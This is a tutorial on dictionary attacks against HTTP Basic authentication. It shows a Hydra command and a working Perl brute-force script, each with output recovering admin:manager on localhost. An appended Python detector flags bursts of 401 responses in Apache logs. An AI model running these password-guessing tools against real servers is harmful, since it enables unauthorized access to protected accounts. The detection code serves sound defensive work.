Basic HTTP Authentication Dictionary Attack
Sometimes you come across basic HTTP authentication that needs to be cracked in order to gain access to the protected contents of the server. There are two ways to accomplish the task: one is to use Hydra to brute-force the login, and the other is to write our own script in Perl.
    hydra -l admin -P wordlist.txt <hostname> http-get <web-directory>

    root@ubuntu:~/public_html# hydra -l admin -P wordlist.txt localhost http-get /~sam/protected
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    Hydra (http://www.thc.org/thc-hydra) starting at 2019-08-17 12:26:44
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 109 login tries (l:1/p:109), ~7 tries per task
    [DATA] attacking http-get://localhost:80//~sam/protected
    [80][http-get] host: localhost login: admin password: manager
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2019-08-17 12:26:46
    root@ubuntu:~/public_html#
We can also write our own script in Perl to run a dictionary attack against basic HTTP authentication.
    #!/usr/bin/env perl
    #
    # basic http auth brute force
    #
    use strict;
    use warnings;
    use LWP::UserAgent;
    use URI;

    ## Target URL
    my $target = URI->new("http://localhost/~sam/protected/");
    my $host = $target->host.":".$target->port;

    ## Realm to use
    my $realm = "Protected Content";

    ## User to brute force
    my $user = "admin";

    ## Passwords list
    my $wordlist = "wordlist.txt";

    open(my $fh, '<', $wordlist) or die $!;

    my $user_agent = LWP::UserAgent->new();

    while (my $pass = <$fh>) {
        chomp($pass);
        $user_agent->credentials($host, $realm, $user, $pass);
        my $res = $user_agent->get($target);
        print "200 OK -> $user:$pass\n" if ($res->is_success);
    }
If we run the script, we get the username and password based on an HTTP 200 OK response code.
    sam@ubuntu:~/public_html$ perl basic-http-auth.pl
    200 OK -> admin:manager
    sam@ubuntu:~/public_html$
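Seen from the server, both the Hydra run and the Perl script above appear in the access log as a burst of 401 responses for one user from one client, ending in a 200. The detector below is an added example, not part of the original post; it assumes Apache combined log format, and the threshold, window, function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log: client, identd, auth user, [time], "request", status, ...
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')

def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Report (client, user) pairs with >= threshold 401s inside the window.

    threshold and window are assumed values; tune them to the site's traffic.
    """
    recent = defaultdict(deque)  # (ip, user) -> timestamps of 401s in the window
    peak = defaultdict(int)      # (ip, user) -> largest burst of 401s seen
    guessed = set()              # pairs that got a 2xx after earlier 401s
    for line in lines:
        m = LINE.match(line)
        if not m or m["user"] == "-":
            continue  # unparsable line, or request sent without credentials
        key = (m["ip"], m["user"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        status = int(m["status"])
        if status == 401:
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            peak[key] = max(peak[key], len(q))
        elif 200 <= status < 300 and recent[key]:
            guessed.add(key)            # success that follows failed attempts
    return [
        {"ip": ip, "user": user, "failures": n,
         "password_guessed": (ip, user) in guessed}
        for (ip, user), n in peak.items() if n >= threshold
    ]

def _line(ip, user, sec, status):
    # Constructed log line for the example; not taken from a real server.
    return (f'{ip} - {user} [17/Aug/2019:12:26:{sec:02d} +0000] '
            f'"GET /~sam/protected/ HTTP/1.1" {status} 381 "-" "-"')

SAMPLE = (
    [_line("127.0.0.1", "admin", 44 + i // 10, 401) for i in range(20)]
    + [_line("127.0.0.1", "admin", 46, 200)]
    # A user who mistypes once and then logs in stays below the threshold.
    + [_line("192.0.2.10", "sam", 50, 401), _line("192.0.2.10", "sam", 55, 200)]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

An alert with password_guessed set to true means the burst ended in a successful login, so the account's password should be treated as known to the client and rotated.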